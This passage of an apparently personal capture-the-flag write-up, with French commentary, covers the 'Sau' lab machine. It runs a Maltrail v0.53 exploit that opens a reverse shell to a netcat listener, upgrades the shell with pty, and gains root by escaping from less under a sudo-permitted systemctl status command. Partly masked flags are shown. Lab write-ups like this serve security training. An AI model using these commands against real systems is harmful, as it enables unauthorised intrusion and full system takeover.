id="exploitation-maltrail">Exploitation Maltrail </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~/HTB/Sau/maltrail-exploit/Maltrail-v0.53-Exploit<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ python3 exploit.py 10.10.14.160 <span class="m">55555</span> http://10.10.11.224:55555/pleffy </span></span><span class="line"><span class="cl">Running exploit on http://10.10.11.224:55555/pleffy/login </span></span></code></pre></td></tr></table> </div> </div><h3 id="reverse-shell">Reverse Shell </h3><p>Open reverse shell. Listening with nc at the same time we launch the exploit.py</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">┌──<span class="o">(</span>kali㉿kali<span class="o">)</span>-<span class="o">[</span>~<span class="o">]</span> </span></span><span class="line"><span class="cl">└─$ sudo nc -lvp <span class="m">55555</span> </span></span><span class="line"><span class="cl"><span class="o">[</span>sudo<span class="o">]</span> Mot de passe de kali : </span></span><span class="line"><span class="cl">listening on <span class="o">[</span>any<span class="o">]</span> <span class="m">55555</span> ... </span></span><span class="line"><span class="cl">10.10.11.224: inverse host lookup failed: Unknown host </span></span><span class="line"><span class="cl">connect to <span class="o">[</span>10.10.14.160<span class="o">]</span> from <span class="o">(</span>UNKNOWN<span class="o">)</span> <span class="o">[</span>10.10.11.224<span class="o">]</span> <span class="m">50528</span> </span></span><span class="line"><span class="cl">$ ls </span></span><span class="line"><span class="cl">ls </span></span><span class="line"><span class="cl">CHANGELOG core maltrail-sensor.service plugins thirdparty </span></span><span class="line"><span class="cl">CITATION.cff docker maltrail-server.service requirements.txt trails </span></span><span class="line"><span class="cl">LICENSE h maltrail.conf sensor.py </span></span><span class="line"><span class="cl">README.md html misc server.py </span></span><span class="line"><span class="cl">$ whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">puma </span></span></code></pre></td></tr></table> </div> </div><h3 id="open-python-bash">Open python bash </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">python3 -c <span class="s1">&#39;import pty;pty.spawn(&#34;/bin/bash&#34;)&#39;</span> </span></span><span class="line"><span class="cl">puma@sau:~$ whoami </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">puma </span></span></code></pre></td></tr></table> </div> </div><h3 id="user-flag">User flag </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">puma@sau:~$ ls </span></span><span class="line"><span class="cl">ls </span></span><span class="line"><span class="cl">linpeas.sh systemctl u user.txt </span></span><span class="line"><span class="cl">puma@sau:~$ cat user* </span></span><span class="line"><span class="cl">cat user* </span></span><span class="line"><span class="cl">d302.....b9f0 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="enumeration-1">Enumeration </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span><span class="lnt">7 </span><span class="lnt">8 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ sudo -l </span></span><span class="line"><span class="cl">sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> puma on sau: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, </span></span><span class="line"><span class="cl"> <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User puma may run the following commands on sau: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL : ALL<span class="o">)</span> NOPASSWD: /usr/bin/systemctl status trail.service </span></span></code></pre></td></tr></table> </div> </div><p>On peut voir qu&rsquo;il peut executer cette commande en tant qu&rsquo;administrateur :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo /usr/bin/systemctl status trail.service </span></span></code></pre></td></tr></table> </div> </div><h3 id="systemctl-status-trailservice">systemctl status trail.service </h3><p>Lorsqu&rsquo;on l&rsquo;execute, on observe que la commande utilise <code>less</code>. Or, si less est executé en tant qu&rsquo;administrateur, on peut lancer un shell en tant que root. J&rsquo;ai pu trouver cette information en cherchant sur ce site :</p> <p><a class="link" href="https://gtfobins.github.io/gtfobins/less/" target="_blank" rel="noopener" >https://gtfobins.github.io/gtfobins/less/</a></p> <p>Par exemple, on peut écrire: <strong>!/bin/sh</strong><br> Lorsque less est executé en tant qu&rsquo;admin, ça doit lancer un shell en tant que root</p> <h3 id="exploit--less">Exploit : less </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ sudo /usr/bin/systemctl status trail.service </span></span><span class="line"><span class="cl">sudo /usr/bin/systemctl status trail.service </span></span><span class="line"><span class="cl">WARNING: terminal is not fully functional </span></span><span class="line"><span class="cl">- <span class="o">(</span>press RETURN<span class="o">)</span>!/bin/sh </span></span><span class="line"><span class="cl">!//bbiinn//sshh!/bin/sh </span></span><span class="line"><span class="cl"><span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">whoami </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1"># cd /root </span> </span></span><span class="line"><span class="cl"><span class="nb">cd</span> /root </span></span><span class="line"><span class="cl"><span class="c1"># ls</span> </span></span><span class="line"><span class="cl">ls </span></span><span class="line"><span class="cl">go root.txt </span></span><span class="line"><span class="cl"><span class="c1"># cat roo*</span> </span></span><span class="line"><span class="cl">cat roo* </span></span><span class="line"><span class="cl">047d.....6de3 </span></span></code></pre></td></tr></table> </div> </div>https://leopoldabgn.github.io/writeups/archives/Sun, 06 Mar 2022 00:00:00 +0000https://leopoldabgn.github.io/writeups/archives/https://leopoldabgn.github.io/writeups/links/Mon, 01 Jan 0001 00:00:00 +0000https://leopoldabgn.github.io/writeups/links/https://leopoldabgn.github.io/writeups/search/Mon, 01 Jan 0001 00:00:00 +0000https://leopoldabgn.github.io/writeups/search/